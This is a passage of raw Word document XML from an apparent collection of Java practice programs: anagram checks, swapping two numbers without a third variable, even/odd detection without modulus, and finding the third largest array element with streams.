      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D34FD35"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hm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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E29C45"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491B784"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53A227C"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hm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qual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hm2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5249DF97"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77137719"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CCF2B8"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1884168"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tr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LISTEN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341EDFA"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tr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SILENT"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03535655"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heckAnagramUsingArr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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F23AB6F" w14:textId="77777777"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heckAnagramUsingCollec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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC9697" w14:textId="7C025740"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46C7109" w14:textId="507E1FC9" w:rsidR="00100B16" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581351FF" w14:textId="77777777" w:rsidR="00AE118C" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE118C" w:rsidP="00AE118C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F595C40" w14:textId="12767B5A" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="316" w:name="_Toc196307796"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program </w:t>
      </w:r>
      <w:r w:rsidR="00DF32EE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- Swap two numbers without using a third variable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
    </w:p>
    <w:p w14:paraId="07AC1785" w14:textId="77777777" w:rsidR="00DF32EE" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF32EE" w:rsidP="00DF32EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0BF514" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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wapNumber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4C5C174" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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19B5A08" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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b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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9A50B" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D836B" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Before swap: a =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b =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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C77358" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0B7C9" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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wap logic without third variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB75211" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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a = 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D42AEC" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        b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b = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F63EB" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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a = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D291373" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDBFDE4" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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fter swap: a =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b =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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7E8E0" w14:textId="77777777" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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51FEE23" w14:textId="31456B66" w:rsidR="00A40064" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E65F49" w14:textId="77777777" w:rsidR="00DF32EE" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF32EE" w:rsidP="00DF32EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D598A51" w14:textId="1DDA392E" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="_Toc196307797"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00321FFD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00E85FB7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00321FFD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rint even and odd numbers without using the modulus operator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w14:paraId="416A4D98" w14:textId="194127DD" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E32DAF" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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venOddWithoutModulu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65C7182" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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37B6764" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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ber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4</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6</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7</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8</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9</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303A0EAB" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E517776" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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be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660AC54" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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um </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</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5BFF0C6" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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is Even"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84C91A" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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ls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423B6DF" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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is Odd"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B6D57" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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20E84C4" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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20804BC" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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9BB8056" w14:textId="6F526661" w:rsidR="00B219F1" w:rsidRPr="00CE4B95"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50181F59" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00B219F1" w:rsidP="00B219F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78551815" w14:textId="0475034B" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="318" w:name="_Toc196307798"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00D61AB3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find third largest number from array using java 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="318"/>
    </w:p>
    <w:p w14:paraId="071953DB" w14:textId="20DB886C" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499144D4" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="650A4AD6" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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omparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5DB11" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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Optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B120786" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB76C2F" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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hirdLargestEleme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0BE0C02" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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5DF86C3" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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9</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7</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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41BF1C" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D4799" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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Optional</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thirdLarges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rr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C09BC9" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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oxed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F255ABE" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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istinct</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716F400" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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orted</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omparat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verseOrder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469BA10E" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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kip</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p>
    <w:p w14:paraId="5B7E7611" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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indFirst</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D845E2B" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D51FD" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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hirdLarge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Prese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1DF43DB" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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Third largest elemen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thirdLarges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p>
    <w:p w14:paraId="7D3B0697" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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ls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C78CD7C" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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rray doesn't have a third largest element."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216FE6FD" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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CFD42B0" w14:textId="77777777" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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70B589B" w14:textId="6C7D6F8E" w:rsidR="009305EE" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
